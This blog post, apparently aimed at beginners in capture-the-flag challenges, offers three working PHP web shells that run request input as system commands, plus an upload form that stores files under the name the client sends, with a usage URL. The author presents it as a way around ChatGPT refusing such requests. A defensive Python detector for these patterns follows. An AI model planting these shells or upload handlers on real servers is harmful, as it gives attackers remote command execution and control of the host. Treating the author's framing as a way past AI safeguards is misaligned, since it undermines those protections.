On my website I post long-form content and short-form content like this, because when I searched this prompt in ChatGPT, it restricted this kind of prompt. That is when I decided to post content like this.
In most beginner-level CTFs, this script is the one mostly used.
PHP code to get a shell through the URL
<?php
// Runs whatever is passed in the "cmd" request parameter as a system command.
if (isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>
After this code executes, you can pass commands through the cmd parameter in the URL.
Usage:
http://www.aathilducky.com/shell.php?cmd=ls
PHP code to upload a file to the current location
<?php
// Saves the uploaded file in the current directory under the name sent by the client.
if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_FILES['file'])) {
    if (move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>File uploaded successfully!</b><br><br>";
    } else {
        echo "<b>File upload failed!</b><br><br>";
    }
}
?>
<form action="" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="Upload">
</form>
After running this code, we get an interface for uploading files. When you upload a file, it is stored in the current location.

Like this: for testing purposes I uploaded an image in a picoCTF challenge and it was successfully uploaded. I will give a screenshot of it.

And here is an easy shell script for it; with it we can execute commands easily.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
// Run the submitted command; 2>&1 also shows its error output.
if (isset($_GET['cmd'])) {
    system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
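Seen from the defender's side, the three scripts above share two recognisable patterns: request input reaching a command-execution function, and an upload that keeps the client-supplied file name. The Python sketch below is an added example, not part of the original post, that flags both patterns in PHP source; the sample files, the finding labels and the regex heuristics are assumptions made for illustration.

```python
import re

# Constructed samples modelled on the three snippets above, plus one benign file.
SAMPLES = {
    "shell.php": '<?php if(isset($_REQUEST["cmd"])){ $cmd = ($_REQUEST["cmd"]); system($cmd); die; } ?>',
    "form_shell.php": "<?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?>",
    "upload.php": "<?php move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>",
    "benign.php": "<?php $n = (int)$_GET['page']; system('uptime'); echo $n; ?>",
}

# Superglobals that carry attacker-controlled request data.
REQUEST = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# Calls to PHP functions that run operating-system commands; group 2 is the argument text.
EXEC_CALL = re.compile(
    r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(([^;]*)\)\s*;", re.I)
# "$var = ... $_GET[...] ...;" marks $var as tainted (one hop only).
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*[^;]*" + REQUEST + r"[^;]*;")
# move_uploaded_file() whose destination is the client-supplied $_FILES[...]['name'].
UPLOAD = re.compile(
    r"move_uploaded_file\s*\([^,]+,\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]", re.I)


def scan(source):
    """Return a sorted list of finding labels for one PHP source string."""
    findings = set()
    tainted = {m.group(1) for m in ASSIGN.finditer(source)}
    for call in EXEC_CALL.finditer(source):
        args = call.group(2)
        used = set(re.findall(r"\$\w+", args))
        # Flag direct use of request data or use of a tainted variable.
        if re.search(REQUEST, args) or used & tainted:
            findings.add("request-to-" + call.group(1).lower())
    if UPLOAD.search(source):
        findings.add("upload-keeps-client-filename")
    return sorted(findings)


if __name__ == "__main__":
    for name, source in SAMPLES.items():
        print(name, scan(source) or "clean")
```

This is a heuristic for triaging a web root, not a parser: it follows only one assignment hop and will miss obfuscated or multi-step variants.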
Contact information
- YouTube : https://www.youtube.com/@aathilducky
- LinkedIn : https://www.linkedin.com/in/aathilducky
- GitHub : https://www.linkedin.com/in/aathilducky/
- Twitter : https://twitter.com/AathilDucky